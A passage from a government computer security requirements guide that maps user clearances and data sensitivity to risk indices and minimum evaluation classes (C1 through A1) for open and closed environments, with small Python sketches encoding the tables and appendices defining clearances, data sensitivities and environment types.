difference derives from the fact that the loss of Top Secret data causes
exceptionally grave damage to the national security, whereas the loss of Secret
data causes only serious damage.(4)


                            TABLE 3
                  SECURITY RISK INDEX MATRIX

                         Maximum Data Sensitivity

                             U     N     C    S    TS   1C   MC

                      U      0     1     2    3    5    6    7
                      N      0     0     1    2    4    5    6
   Minimum            C      0     0     0    1    3    4    5
   Clearance          S      0     0     0    0    2    3    4
   or
   Authorization    TS(BI)   0     0     0    0    0    2    3
   of
   System Users     TS(SBI)  0     0     0    0    0    1    2
                      1C     0     0     0    0    0    0    1
                      MC     0     0     0    0    0    0    0

U = Uncleared or Unclassified
N = Not Cleared but Authorized Access to Sensitive Unclassified Information or
Not Classified but Sensitive
C = Confidential
S = Secret
TS = Top Secret
TS(BI) = Top Secret (Background Investigation)
TS(SBI) = Top Secret (Special Background Investigation)
1C = One Category
MC = Multiple Categories

In situations where the local environment indicates that additional risk
factors are present, a larger risk index may be warranted.  Table 2 and the
above discussion show how the presence of nonhierarchical sensitivity
categories such as NOFORN (Not Releasable to Foreign Nationals) and PROPIN
(Caution-Proprietary Information Involved) influences the ratings.(14)
Compartmented information is also encompassed by the term sensitivity
categories, as is information revealing sensitive intelligence sources and
methods.  A subcategory (and a subcompartment) is considered to be independent
from the category to which it is subsidiary.

Table 3 presents a matrix summarizing the risk indices corresponding to the
various clearance/sensitivity pairings. For simplicity no categories are
associated with the maximum data sensitivity levels below Top Secret.
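The matrix entries follow from applying the Section 2 formula to the Table 1
and Table 2 ratings. A minimal cross-check sketch (names are illustrative; the
footnote 2 anomaly for TS(BI)/TS is special-cased, and the matrix's assumption
that all users are authorized access to all categories makes Case b yield 0):

```python
# Reproducing the Table 3 risk index matrix from the rating scales (sketch).
R_MIN = {"U": 0, "N": 1, "C": 2, "S": 3, "TS(BI)": 4, "TS(SBI)": 5, "1C": 6, "MC": 7}
R_MAX = {"U": 0, "N": 1, "C": 2, "S": 3, "TS": 5, "1C": 6, "MC": 7}

def matrix_entry(clearance, sensitivity):
    if clearance == "TS(BI)" and sensitivity == "TS":
        return 0  # anomalous case described in footnote 2
    rmin, rmax = R_MIN[clearance], R_MAX[sensitivity]
    # Case a when rmin < rmax; Case b (all users authorized) otherwise.
    return rmax - rmin if rmin < rmax else 0

for clearance in R_MIN:
    print(clearance, [matrix_entry(clearance, s) for s in R_MAX])
```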

3.0 COMPUTER SECURITY REQUIREMENTS FOR OPEN
    SECURITY ENVIRONMENTS

This section discusses the application of the Computer Security Requirements to
systems in open security environments. An open security environment is one in
which system applications are not adequately protected against the insertion of
malicious logic.  Appendix C describes malicious logic and the open security
environment in more detail.

3.1 Recommended Classes

Table 4 presents the minimum evaluation class identified in the Computer
Security Requirements for different risk indices in an open security
environment.  Table 5 illustrates the impact of the requirements on individual
minimum clearance/maximum data sensitivity pairings, where no categories are
associated with maximum data sensitivity below Top Secret.  The minimum
evaluation class is determined by finding the matrix entry corresponding to the
minimum clearance or authorization of system users and the maximum sensitivity
of data processed by the system.

     Example: If the minimum clearance of system users is Secret and the
     maximum sensitivity of data processed is Top Secret (with no categories),
     then the risk index is 2 and a class B2 system is required.

The classes identified are minimum values.  Environmental characteristics must
be examined to determine whether a higher class is warranted.  Factors that
might argue for a higher evaluation class include the following:

     a. High volume of information at the maximum data sensitivity.

     b. Large number of users with minimum clearance.

Both of these factors are often present in networks.

The guidance embodied in the Computer Security Requirements is best used during
system requirements definition to determine which class of trusted system is
required given the risk index envisioned for a specific environment. They are
also of use in determining which choices are feasible given either the maximum
sensitivity of data to be processed or minimum user clearance or authorization
requirements. The Computer Security Requirements can also be used in a security
evaluation to determine whether system safeguards are sufficient.

3.2 Risk Index and Operational Modes

Situations with a risk index of zero encompass systems operating in system high
or dedicated mode.  Systems operating in dedicated mode--in which all users
have both the clearance and the need-to-know for all information in the
system--do not need to rely on hardware and software protection measures for
security.(10) Therefore, no minimum level of trust is prescribed.  However,
because of the integrity and denial of service requirements of many systems,
additional protective features may be warranted.


                             TABLE 4

       COMPUTER SECURITY REQUIREMENTS FOR OPEN SECURITY
                         ENVIRONMENTS

    RISK INDEX         SECURITY OPERATING        MINIMUM CRITERIA
                               MODE                  CLASS(1)

         0             Dedicated                   No Prescribed
                                                    Minimum(2)
         0             System High                     C2(3)
         1             Limited Access, Controlled,     B1(4)
                       Compartmented, Multilevel
         2             Limited Access, Controlled,      B2
                       Compartmented, Multilevel
         3             Controlled, Multilevel           B3
         4             Multilevel                       A1
         5             Multilevel                       *
         6             Multilevel                       *
         7             Multilevel                       *

1 The asterisk (*) indicates that computer protection for environments with
that risk index is considered to be beyond the state of current technology.
Such environments must augment technical protection with personnel or
administrative security safeguards.

2 Although there is no prescribed minimum, the integrity and denial of service
requirements of many systems warrant at least class C1 protection.

3 If the system processes sensitive or classified data, at least a class C2
system is required.  If the system does not process sensitive or classified
data, a class C1 system is sufficient.

4 Where a system processes classified or compartmented data and some users do
not have at least a Confidential clearance, or when there are more than two
types of compartmented information being processed, at least a class B2 system
is required.
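The Table 4 mapping from risk index to minimum class can be sketched as data;
the dictionary name is illustrative, and the footnoted special cases
(dedicated mode, the C1 case for unclassified data, footnote 4) are noted only
in comments:

```python
# Table 4: risk index -> minimum Criteria class, open security environments.
# "*" marks risk indices beyond the state of current technology.  Risk index 0
# in dedicated mode has no prescribed minimum; the C2 entry assumes system high
# mode with sensitive or classified data (C1 suffices otherwise, footnote 3).
# Footnote 4 raises some B1 cases to B2; that refinement is not encoded here.
OPEN_MIN_CLASS = {
    0: "C2",  # system high mode
    1: "B1", 2: "B2", 3: "B3", 4: "A1",
    5: "*", 6: "*", 7: "*",
}

# Worked example from Section 3.1: Secret users, Top Secret data,
# risk index 2 -> class B2.
print(OPEN_MIN_CLASS[2])  # B2
```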

                            TABLE 5

  SECURITY INDEX MATRIX FOR OPEN SECURITY ENVIRONMENTS(1)

                          Maximum Data Sensitivity

                           U     N     C     S     TS    1C    MC

                     U     C1    B1    B2    B3    *     *     *
      Minimum        N     C1    C2    B2    B2    A1    *     *
      Clearance or   C     C1    C2    C2    B1    B3    A1    *
      Author-        S     C1    C2    C2    C2    B2    B3    A1
      ization      TS(BI)  C1    C2    C2    C2    C2    B2    B3
      of System   TS(SBI)  C1    C2    C2    C2    C2    B1    B2
      Users          1C    C1    C2    C2    C2    C2    C2(2) B1(3)
                     MC    C1    C2    C2    C2    C2    C2(2) C2(2)

1 Environments for which either C1 or C2 is given are for systems that operate
in system high mode.  No minimum level of trust is prescribed for systems that
operate in dedicated mode.  Categories are ignored in the matrix, except for
their inclusion at the TS level.

2 It is assumed that all users are authorized access to all categories present
in the system.  If some users are not authorized for all categories, then a
class B1 system or higher is required.

3 Where there are more than two categories, at least a class B2 system is
required.

U = Uncleared or Unclassified
N = Not Cleared but Authorized Access to Sensitive Unclassified Information or
Not Classified but Sensitive
C = Confidential
S = Secret
TS = Top Secret
TS(BI) = Top Secret (Background Investigation)
TS(SBI) = Top Secret (Special Background Investigation)
1C = One Category
MC = Multiple Categories
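Most Table 5 entries can be recovered by composing the risk index with the
risk-index-to-class mapping. A minimal sketch with illustrative names; a risk
index of 0 yields C2 in system high mode, or C1 when the maximum data
sensitivity is Unclassified, and the footnoted exceptions (e.g., the B2 cells
required by footnote 4 of Table 4) are not reproduced:

```python
# Deriving open-environment minimum classes from risk index (sketch).
OPEN_MIN_CLASS = {1: "B1", 2: "B2", 3: "B3", 4: "A1", 5: "*", 6: "*", 7: "*"}

def open_min_class(risk_index, max_sensitivity):
    if risk_index == 0:
        # System high mode: C2 for sensitive/classified data, C1 otherwise.
        return "C1" if max_sensitivity == "U" else "C2"
    return OPEN_MIN_CLASS[risk_index]

print(open_min_class(0, "U"))   # C1
print(open_min_class(2, "TS"))  # B2, e.g. the S/TS pairing
print(open_min_class(5, "TS"))  # *, e.g. the U/TS pairing
```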

In system high mode, all users have sufficient security clearances and category
authorizations for all data, but some users do not have a need-to-know for all
information in the system.(10) Systems that operate in system high mode thus
are relied on to protect information from users who do not have the appropriate
need-to-know. Where classified or sensitive unclassified data is involved, no
less than a class C2 system is allowable due to the need for individual
accountability.

In accordance with policy, individual accountability requires that individual
system users be uniquely identified and an automated audit trail kept of their
actions.  Class C2 systems are the lowest in the hierarchy of trusted systems
to provide individual accountability and are therefore required where sensitive
or classified data is involved.  The only case where no sensitive or classified
data is involved is the case in which the maximum sensitivity of data is
unclassified.  In this case, hardware and software controls are still required
to allow users to protect project or private information and to keep other
users from accidentally reading or destroying their data.  However, since there
is no officially sensitive data involved, individual accountability is not
required and a class C1 system suffices.  In system high mode sensitivity
labels are not required for making access control decisions.  In this mode
access is based on the need-to-know, which is based on permissions (e.g., group
A has access to file A), not on sensitivity labels.  The type of access control
used to provide need-to-know protection is called discretionary access control.
It is defined as a means of restricting access to objects based on the identity
of subjects and/or groups to which the subjects belong.  All systems above
Division D provide discretionary access control mechanisms.  These mechanisms
are more finely grained in class C2 systems than in Class C1 systems in that
they provide the capability of including or excluding access to the granularity
of a single user.  Division C systems (C1 and C2) do not possess the capability
to provide trusted labels on output.  Therefore, output from these systems must
be labeled at the system high level and manually reviewed by a responsible
individual to determine the correct sensitivity prior to release beyond the
perimeter of the system high protections of the system.(10)

Environments with a risk index of 1 or higher encompass systems operating in
controlled, compartmented, and multilevel modes.  These environments require
mandatory access control, which is the type of access control used to provide
protection based on sensitivity labels.  It is defined as a means of
restricting access to objects based on the sensitivity (as represented by a
label) of the information contained in the objects and the formal clearance or
authorization of subjects to access information of such sensitivity.  Division
B and A systems provide mandatory access control, and are therefore required
for all environments with risk indices of 1 or greater.

The need for internal labeling has a basis in policy, in that DoD Regulation
5200.1-R requires computer systems that process sensitive or classified data to
provide internal classification markings.(3) Other requirements also exist.

     Example: The DCID entitled "Security Controls on the Dissemination of
     Intelligence Information" requires that security control markings be
     "associated (in full or abbreviated form) with data stored or processed in
     automatic data processing systems."(14)

Sensitivity labeling is also required for sensitive unclassified data.(15,16)

     Example: Data protected by Freedom of Information (FOI) Act exemptions
     must be labeled as being "exempt from mandatory disclosure under the FOI
     Act."(15)

This example illustrates not only the need for labeling but also the fact that
the purpose of FOI Act exemptions is to provide access control protection for
sensitive data.  In summary, it is a required administrative security practice
that classified and unclassified sensitive information be labeled and
controlled based on the labels.  It follows that prudent computer security
practice requires similar labeling and mandatory access control.

The minimum class recommended for environments requiring mandatory access
control is class B1, since class B1 systems are the lowest in the hierarchy of
trusted systems to provide mandatory access control.

     Example:  Where no categories are involved, systems with minimum
     clearance/maximum data sensitivity pairings of U/N and C/S have a risk
     index of 1 and thus require at least a class B1 system.

Some systems that operate in system high mode use mandatory access control for
added protection within the system high environment, even though the controls
are not relied upon to properly label and protect data passing out of the
system high environment.  There has also been a recommendation that mandatory
access controls (i.e., class B1 or higher systems) be used whenever data at two
or more sensitivity levels is being processed, even if everyone is fully
cleared, in order to reduce the likelihood of mixing data from files of higher
sensitivity with data from files of lower sensitivity and releasing the data at
the lower sensitivity.(17) These points reaffirm the fact that the classes
identified in the requirements are minimum values.

This report emphasizes that output from a system operating in system high mode
must be stamped with the sensitivity and category labels of the most sensitive
data in the system until the data is examined by a responsible individual and
its true sensitivity level and category are determined.  If a system can only
be trusted for system high operation, its labels cannot be assumed to
accurately reflect data sensitivity.  The use of division B or A systems does
not necessarily solve this problem.

     Example: Take the case of a system in an open security environment that
     processes data classified up to Secret and supports some users who have
     only Confidential clearances.  According to the requirements, such a
     situation represents a risk index of 1 and thus requires a class B1
     system.  Some of the reports produced by the system might be unclassified.
     Nevertheless, such a report cannot be forwarded to uncleared people until
     the report is examined and its contents determined to be unclassified.
     Without the existence of such a review, the recipient becomes an indirect
     user and the risk index becomes 3. A class B1 system no longer provides
     adequate data protection. Therefore, even though the system is trusted to
     properly label and segregate Confidential and Secret data, it is not
     simultaneously trusted to properly label and segregate unclassified data.

Systems with a risk index of 2 require more trust than can be placed in a class
B1 system.  Where no categories are involved, class B2 systems are the minimum
required for minimum clearance/maximum data sensitivity pairings such as U/C,
N/S and S/TS, all of which have a risk index of 2.  Class B2 systems have
several characteristics that justify this increased trust:

     a.  The Trusted Computing Base (TCB) is carefully structured into
         protection-critical and nonprotection-critical elements.  The TCB
         interface is well defined, and the TCB design and implementation
         enable it to be subjected to more thorough testing and more complete
         review.

     b.  The TCB is based on a clearly defined and documented formal security
         policy model that requires the discretionary and mandatory access
         control enforcement found in class B1 systems to be extended to all
         subjects and objects in the system. That is, security rules are more
         rigorously defined and have a greater influence on system design.

     c.  Authentication mechanisms are strengthened, making it more difficult
         for a malicious user or malicious software to improperly intervene in
         the login process.

     d.  Stringent configuration management controls are imposed for life-cycle
         assurance.

     e.  Covert channels are addressed to defend against their exploitation by
         malicious software.(18) A covert channel is a communication channel
         that violates the system's security policy.

Because of these and other characteristics, class B2 systems are relatively
resistant to penetration.  A risk index of 3, however, requires greater
resistance to penetration.  Class B3 systems are highly resistant to
penetration and are the minimum required for situations with a risk index of 3
such as those with minimum clearance/maximum data sensitivity pairings of U/S,
C/TS, S/TS with one category, and TS(BI)/TS with multiple categories.
Characteristics that distinguish class B3 from class B2 systems include the
following:

     a.  The TCB must satisfy the reference monitor requirements that it
         mediate all accesses of subjects to objects, be tamperproof, and be
         small enough to be subjected to analysis and tests.  Much effort is
         thus spent on minimizing TCB complexity.

     b.  Enhancements are made to system audit mechanisms and system
         recovery procedures.

     c.  Security management functions are performed by a security
         administrator rather than a system administrator.

While several new features have been added to class B3 systems, the major
distinction between class B2 and class B3 systems is the increased trust that
can be placed in the TCB of a class B3 system.  The most trustworthy systems
defined by the Criteria are class A1 systems.  Class A1 systems can be used for
situations with a risk index of 4, such as the following minimum
clearance/maximum data sensitivity pairings: N/TS, C/TS with one category, and
S/TS with multiple categories.  Class A1 systems are functionally equivalent to
those in class B3 in that no additional architectural features or policy
requirements are added.  The distinguishing characteristic of systems in this
class is the analysis derived from formal design specification and verification
techniques and the resulting high degree of assurance that the TCB is correctly
implemented.  In addition, more stringent configuration management is required
and procedures are established for securely distributing the system to sites.

The capability to support systems in open security environments with a risk
index of 5 or greater is considered to be beyond the state-of-the-art.  For
example, technology today does not provide adequate security protection for an
open environment with uncleared users and Top Secret data.  Such environments
must rely on physical, personnel, or information security solutions or on such
technical approaches as periods processing.

4.0 COMPUTER SECURITY REQUIREMENTS FOR CLOSED
    SECURITY ENVIRONMENTS

This section discusses the application of the Computer Security Requirements to
systems in closed security environments.  A closed security environment is one
in which system applications are adequately protected against the insertion of
malicious logic.  Appendix C describes the closed security environment in more
detail.  The main threat to the TCB from applications in this environment is
not malicious logic, but logic containing unintentional errors that might be
exploited for malicious purposes.  As system quality reaches class B2, the
threat from logic containing unintentional errors is substantially reduced.
This reduction permits the placement of increased trust in class B2 systems due
to (1) the increased attention that B2 systems give to the interface between
the application programs and the operating system, (2) the formation of a more
centralized TCB, and (3) the elimination of penetration flaws.  Nevertheless,
the evaluation class of B1 assigned for open security environments cannot be
reduced to a class C1 or C2 in closed security environments because of the
requirement for mandatory access controls.

Table 6 presents the minimum evaluation class identified in the Computer
Security Requirements for different risk indices in a closed security
environment.  The principal difference between the requirements for the open
and closed environments is that in closed environments class B2 systems are
trusted to provide sufficient protection for a greater risk index.  As a
result, environments are supportable that were not supportable in open
situations (e.g., uncleared user on a system processing Top Secret data).
Table 7 illustrates the requirements' impact on individual minimum
clearance/maximum data sensitivity pairings.

                             TABLE 6

      COMPUTER SECURITY REQUIREMENTS FOR CLOSED SECURITY
                         ENVIRONMENTS

   RISK INDEX         SECURITY OPERATING        MINIMUM CRITERIA
                              MODE                  CLASS(1)

        0             Dedicated                   No Prescribed
                                                   Minimum(2)
        0             System High                     C2(3)
        1             Limited Access, Controlled,     B1(4)
                      Compartmented, Multilevel
        2             Limited Access, Controlled,      B2
                      Compartmented, Multilevel
        3             Controlled, Multilevel           B2
        4             Multilevel                       B3
        5             Multilevel                       A1
        6             Multilevel                       *
        7             Multilevel                       *

1 The asterisk (*) indicates that computer protection for environments with
that risk index is considered to be beyond the state of current technology.
Such environments must augment technical protection with physical, personnel,
and/or administrative safeguards.

2 Although there is no prescribed minimum, the integrity and denial of service
requirements of many systems warrant at least class C1 protection.

3 If the system processes sensitive or classified data, at least a class C2
system is required.  If the system does not process sensitive or classified
data, a class C1 system is sufficient.

4 Where a system processes classified or compartmented data and some users do
not have at least a Confidential clearance, at least a class B2 system is
required.

                             TABLE 7
      SECURITY INDEX MATRIX FOR CLOSED SECURITY ENVIRONMENTS(1)

                            Maximum Data Sensitivity

                        U     N     C     S     TS    1C    MC

                  U     C1    B1    B2    B2    A1    *     *
   Minimum        N     C1    C2    B1    B2    B3    A1    *
   Clearance or   C     C1    C2    C2    B1    B2    B3    A1
   Author-        S     C1    C2    C2    C2    B2    B2    B3
   ization      TS(BI)  C1    C2    C2    C2    C2    B2    B2
   of System   TS(SBI)  C1    C2    C2    C2    C2    B1    B2
   Users         1C     C1    C2    C2    C2    C2    C2(2) B1(3)
                 MC     C1    C2    C2    C2    C2    C2(2) C2(2)

1 Environments for which either C1 or C2 is given are for systems that operate
in system high mode.  There is no prescribed minimum level of trust for systems
that operate in dedicated mode.  Categories are ignored in the matrix, except
for their inclusion at the TS level.

2 It is assumed that all users are authorized access to all categories on the
system. If some users are not authorized for all categories, then a class B1
system or higher is required.

3 Where there are more than two categories, at least a class B2 system is
required.

U = Uncleared or Unclassified
N = Not Cleared but Authorized Access to Sensitive Unclassified Information or
Not Classified but Sensitive
C = Confidential
S = Secret
TS = Top Secret
TS(BI) = Top Secret (Background Investigation)
TS(SBI) = Top Secret (Special Background Investigation)
1C = One Category
MC = Multiple Categories
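Table 7, likewise, is just a two-dimensional lookup from a (minimum clearance,
maximum data sensitivity) pairing to a minimum class. The sketch below is our
own encoding of the matrix; the names are hypothetical, and the footnoted
exceptions for categories are not modeled.

```python
# Our own encoding of Table 7 for a closed security environment.
# Rows: minimum clearance or authorization of system users.
# Columns: maximum data sensitivity.  "*" = beyond current technology.
SENSITIVITIES = ["U", "N", "C", "S", "TS", "1C", "MC"]

MATRIX = {
    "U":       ["C1", "B1", "B2", "B2", "A1", "*",  "*"],
    "N":       ["C1", "C2", "B1", "B2", "B3", "A1", "*"],
    "C":       ["C1", "C2", "C2", "B1", "B2", "B3", "A1"],
    "S":       ["C1", "C2", "C2", "C2", "B2", "B2", "B3"],
    "TS(BI)":  ["C1", "C2", "C2", "C2", "C2", "B2", "B2"],
    "TS(SBI)": ["C1", "C2", "C2", "C2", "C2", "B1", "B2"],
    "1C":      ["C1", "C2", "C2", "C2", "C2", "C2", "B1"],
    "MC":      ["C1", "C2", "C2", "C2", "C2", "C2", "C2"],
}

def min_class_for_pairing(clearance: str, sensitivity: str) -> str:
    """Minimum class for a clearance/sensitivity pairing (per Table 7)."""
    return MATRIX[clearance][SENSITIVITIES.index(sensitivity)]
```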

                   APPENDIX A

              SUMMARY OF CRITERIA

The DoD Trusted Computer System Evaluation
Criteria(4) provides a basis for specifying security requirements and a metric
with which to evaluate the degree of trust that can be placed in a computer
system.  These criteria are hierarchically ordered into a series of evaluation
classes where each class embodies an increasing amount of trust.  A summary of
each evaluation class is presented in this appendix.  This summary should not
be used in place of the Criteria.  The evaluation criteria are based on six
fundamental security requirements that deal with controlling access to
information.  These requirements can be summarized as follows:

   a. Security policy--There must be an explicit and well-defined security
      policy enforced by the system.

   b. Marking--Access control labels must be associated with objects.

   c. Identification--Individual subjects must be identified.

   d. Accountability--Audit information must be selectively kept and
      protected so that actions affecting security can be traced to the
      responsible party.

   e. Assurance--The computer system must contain hardware and software
      mechanisms that can be evaluated independently to provide sufficient
      assurance that the system enforces the security policy.

   f. Continuous protection--The trusted mechanisms that enforce the
      security policy must be protected continuously against tampering and
      unauthorized changes.

The evaluation criteria are divided into four divisions--D, C, B, and A;
divisions C, B, and A are further subdivided into classes.  Division D
represents minimal protection, and class A1 is the most trustworthy and
desirable from a computer security point of view.

The following overviews are excerpts from the Criteria:

   Division D: Minimal Protection. This division contains only one class. It is
reserved for those systems that have been evaluated but fail to meet the
requirements for a higher evaluation class.

   Division C: Discretionary Protection. Classes in this division provide for
discretionary (need-to-know) protection and accountability of subjects and the
actions they initiate, through inclusion of audit capabilities.

     Class C1: Discretionary Security Protection.  The TCB of class C1 systems
nominally satisfies the discretionary security requirements by providing
separation of users and data.  It incorporates some form of credible controls
capable of enforcing access limitations on an individual basis, i.e.,
ostensibly suitable for allowing users to be able to protect project or private
information and to keep other users from accidentally reading or destroying
their data.  The class C1 environment is expected to be one of cooperating
users processing data at the same level(s) of sensitivity.

     Class C2: Controlled Access Protection. Systems in this class enforce a
more finely grained discretionary access control than class C1 systems, making
users individually accountable for their actions through login procedures,
auditing of security-relevant events, and resource encapsulation.

     Division B: Mandatory Protection.  The notion of a TCB that preserves the
integrity of sensitivity labels and uses them to enforce a set of mandatory
access control rules is a major requirement in this division.  Systems in this
division must carry the sensitivity labels with major data structures in the
system.  The system developer also provides the security policy model on which
the TCB is based and furnishes a specification of the TCB.  Evidence must be
provided to demonstrate that the reference monitor concept has been
implemented.

     Class B1: Labeled Security Protection. Class B1 systems require all the
features required for class C2. In addition, an informal statement of the
security policy model, data labeling, and mandatory access control over named
subjects and objects must be present. The capability must exist for accurately
labeling exported information. Any flaws identified by testing must be removed.

     Class B2: Structured Protection.  In class B2 systems, the TCB is based on
a clearly defined and documented formal security policy model that requires the
discretionary and mandatory access control enforcement found in B1 systems be
extended to all subjects and objects in the system.  In addition, covert
channels are addressed.  The TCB must be carefully structured into
protection-critical and nonprotection-critical elements.  The TCB interface is
well defined and the TCB design and implementation enable it to be subjected to
more thorough testing and more complete review.  Authentication mechanisms are
strengthened, trusted facility management is provided in the form of support
for systems administrator and operator functions, and stringent configuration
management controls are imposed.  The system is relatively resistant to
penetration.

     Class B3: Security Domains. The class B3 TCB must satisfy the reference
monitor requirements that it mediate all accesses of subjects to objects, be
tamperproof, and be small enough to be subjected to analysis and tests. To this
end, the TCB is structured to exclude code not essential to security policy
enforcement, with significant software engineering during TCB design and
implementation directed toward minimizing its complexity.  A security
administrator is supported, audit mechanisms are expanded to signal security-
relevant events, and system recovery procedures are required. The system is
highly resistant to penetration.

     Division A: Verified Protection. This division is characterized by the use
of formal security verification methods to assure that the mandatory and
discretionary security controls employed in the system can effectively protect
the classified and other sensitive information stored or processed by the
system.  Extensive documentation is required to demonstrate that the TCB meets
the security requirements in all aspects of design, development, and
implementation.

   Class A1: Verified Design.  Systems in class A1 are functionally equivalent
to those in class B3 in that no additional architectural features or policy
requirements have been added.  The distinguishing feature of systems in this
class is the analysis derived from formal design specification and verification
techniques and the resulting high degree of assurance that the TCB is correctly
implemented.  This assurance is developmental in nature starting with a formal
model of security policy and a formal top-level specification (FTLS) of the
design.  In keeping with the extensive design and development analysis of the
TCB required of systems in class A1, more stringent configuration management is
required and procedures are established for securely distributing the system to
sites.  A system security administrator is supported.

                        APPENDIX B

   DETAILED DESCRIPTION OF CLEARANCES AND DATA SENSITIVITIES

This appendix describes in detail the clearances and data sensitivities (e.g.,
classification) introduced in the body of the report.

B.1 Clearances

This section defines increasing levels of clearance or authorization of system
users. System users include not only those users with direct connections to the
system but also those users without direct connections who might receive output
or generate input that is not reliably reviewed for classification by a
responsible individual.

   a. Uncleared (U)--Personnel with no clearance or authorization.
      Permitted access to any information for which there are no specified
      controls, such as openly published information.

   b. Unclassified Information (N)--Personnel who are authorized access to
      sensitive unclassified (e.g., For Official Use Only (FOUO)) information,
      either by an explicit official authorization or by an implicit
      authorization derived from official assignments or responsibilities.(15)

   c. Confidential Clearance (C)--Requires U.S. citizenship and typically
      some limited records checking.(19) In some cases, a National Agency
      Check (NAC) is required (e.g., for U.S. citizens employed by colleges or
      universities).(20)

   d. Secret Clearance (S)--Typically requires a NAC, which consists of
      searching the Federal Bureau of Investigation fingerprint and
      investigative files and the Defense Central Index of Investigations.(19)
      In some cases, further investigation is required.

   e. Top Secret Clearance based on a current Background Investigation
      (TS(BI))--Requires an investigation that consists of a NAC, personal
      contacts, record searches, and written inquiries. A BI typically
      includes an investigation extending back 5 years, often with a spot
      check investigation extending back 15 years.(19)

   f. Top Secret Clearance based on a current Special Background
      Investigation (TS(SBI))--Requires an investigation that, in addition to
      the investigation for a BI, includes additional checks on the subject's
      immediate family (if foreign born) and spouse and neighborhood
      investigations to verify each of the subject's former residences in the
      United States where he resided six months or more. An SBI typically
      includes an investigation extending back 15 years.(19)

   g. One Category (1C)1--In addition to a TS(SBI) clearance, written
      authorization for access to one category of information is required.
      Authorizations are the access rights granted to a user by a responsible
      individual (e.g., security officer).

   h. Multiple Categories (MC)1--In addition to a TS(SBI) clearance, written
      authorization for access to multiple categories of information is
      required.

The extent of investigation required for a particular clearance varies based
both on the background of the individual under investigation and on derogatory
or questionable information disclosed during the investigation.  Identical
clearances are assumed to be equivalent, however, despite differences in the
amount of investigation performed.

Individuals from non-DoD agencies might be issued DoD clearances if the
clearance obtained in their agency can be equated to a DoD clearance.  For
example, the "Q" and "L" clearances granted by both the Department of Energy
and the Nuclear Regulatory Commission are considered acceptable for issuance of
a DoD industrial personnel security clearance.(20) The "Q" clearance is
considered an authoritative basis for a DoD Top Secret clearance (based on a
BI) and the "L" clearance is considered an authoritative basis for a DoD Secret
clearance.(20)

Foreign individuals might be granted access to classified U.S. information
although they do not have a U.S. clearance.  Access to classified information
by foreign nationals, foreign governments, international organizations, and
immigrant aliens is addressed by National Disclosure Policy, DoD Directive
5230.11, and DoD Regulation 5200.1-R.(3,21,22) The minimum user clearance
rating table applies in such cases if the foreign clearance can be equated to
one of the clearance or authorization levels in the table.

B.2 Data Sensitivities

Increasing levels of data sensitivity are defined as follows:

     a. Unclassified (U)--Data that is not sensitive or classified:  publicly
        releasable information within a computer system. Note that such data
        might still require discretionary access controls to protect it from
        accidental destruction.

     b. Not Classified but Sensitive (N)--Unclassified but sensitive data. Much
        of this is FOUO data, which is that unclassified data that is exempt
        from release under the Freedom of Information Act.(15) This includes
        data such as the following:

        1. Manuals for DoD investigators or auditors.

1 These are actually authorizations rather than clearance levels, but they are
included here to emphasize their importance.

     2. Examination questions and answers used in determination of the
        qualification of candidates for employment or promotion.

     3. Data that a statute specifically exempts from disclosure, such as
        Patent Secrecy data.(23)

     4. Data containing trade secrets or commercial or financial
        information.

     5. Data containing internal advice or recommendations that reflect
        the decision-making process of an agency.(24)

     6. Data in personnel, medical, or other files that, if disclosed, would
        result in an invasion of personal privacy.(25)

     7. Investigative records.

        DoD Directive 5400.7 prohibits any material other than that cited
        in FOI Act exemptions from being considered or marked
        FOUO.(15) One other form of unclassified sensitive data is that
        pertaining to unclassified technology with military application.(16)
        This refers primarily to documents that are controlled under the
        Scientific and Technical Information Program or acquired under
        the Defense Technical Data Management Program.(26,27) In
        addition to specific requirements for protection of particular forms
        of unclassified sensitive data, there are two general mandates. The
        first is Title 18, U.S. Code 1905, which makes it unlawful for any
        officer or employee of the U.S. Government to disclose information
        of an official nature except as provided by law, including when such
        information is in the form of data handled by computer
        systems.(28) Official data is data that is owned by, produced by or
        for, or is under the control of the DoD. The second is Office of
        Management and Budget (OMB) Circular A-71, Transmittal
        Memorandum Number 1, which establishes requirements for
        Federal agencies to protect sensitive data.(30)

c.   Confidential (C)--Applied to information, the unauthorized disclosure of
     which reasonably could be expected to cause damage to the national
     security.(3)

d.   Secret (S)--Applied to information, the unauthorized disclosure of which
     reasonably could be expected to cause serious damage to the national
     security.(3)

e.   Top Secret (TS)--Applied to information, the unauthorized disclosure of
     which reasonably could be expected to cause exceptionally grave
     damage to the national security.(3)

     f.  One Category (1C)2--Applied to Top Secret Special Intelligence
        information (e.g., Sensitive Compartmented Information (SCI)) or
        operational information (e.g., Single Integrated Operational
        Plan/Extremely Sensitive Information (SIOP/ESI)) that requires
        special controls for restrictive handling.(3) Access to such
        information requires authorization by the office responsible for the
        particular compartment.  Compartments also exist at the C and S levels
        (see the discussion below).

     g.  Multiple Categories (MC)2--Applied to Top Secret Special Intelligence
        or operational information that requires special controls for
        restrictive handling.  This sensitivity level differs from the 1C level
        only in that there are multiple compartments involved.  The number can
        vary from two to many, with corresponding increases in the risk
        involved.

Data sensitivity groupings are not limited to the hierarchical levels discussed
in Section B.2.  Nonhierarchical sensitivity categories such as NOFORN and
PROPIN are also used.(14) Compartmented information is also included under the
term sensitivity categories, as is information revealing sensitive intelligence
sources and methods.  Other sources of sensitivity categories include (a) the
Atomic Energy Act of 1954, (b) procedures based on International Treaty
requirements, and (c) programs for the collection of foreign intelligence or
under the jurisdiction of the National Foreign Intelligence Advisory Board or
the National Communications Security Subcommittee.(11,32,33,34,35) Such
nonhierarchical sensitivity categories can occur at each hierarchical
sensitivity level.

2 These are actually categories rather than classification levels.  They are
included here to emphasize their importance.

                   APPENDIX C

             ENVIRONMENTAL TYPES

The amount of computer security required in a
system depends not only on the risk index (Section 2) but also on the nature of
the environment.  The two environmental types of systems defined in this
document are based on whether the applications that are processed by the TCB
are adequately protected against the insertion of malicious logic.  A system
whose applications are not adequately protected is referred to as being in an
open environment.  If the applications are adequately protected, the system is
in a closed environment.  The presumption is that systems in open environments
are more likely to have malicious applications than systems in closed
environments.  Most systems are in open environments.

Before defining the two environmental categories in more detail, it is
necessary to define several terms.

   a. Environment. The aggregate of external circumstances, conditions,
      and objects that affect the development, operation, and maintenance of
      a system.

   b. Application. Those portions of a system, including portions of the
      operating system, that are not responsible for enforcing the system's
      security policy.

   c. Malicious Logic. Hardware, software, or firmware that is intentionally
      included for the purpose of causing loss or harm (e.g., Trojan horses).

   d. Configuration Control. Management of changes made to a system's
      hardware, software, firmware, and documentation throughout the
      development and operational life of the system.

C.1 Open Security Environment

Based on these definitions, an open security environment includes those systems
in which either of the following conditions holds true:

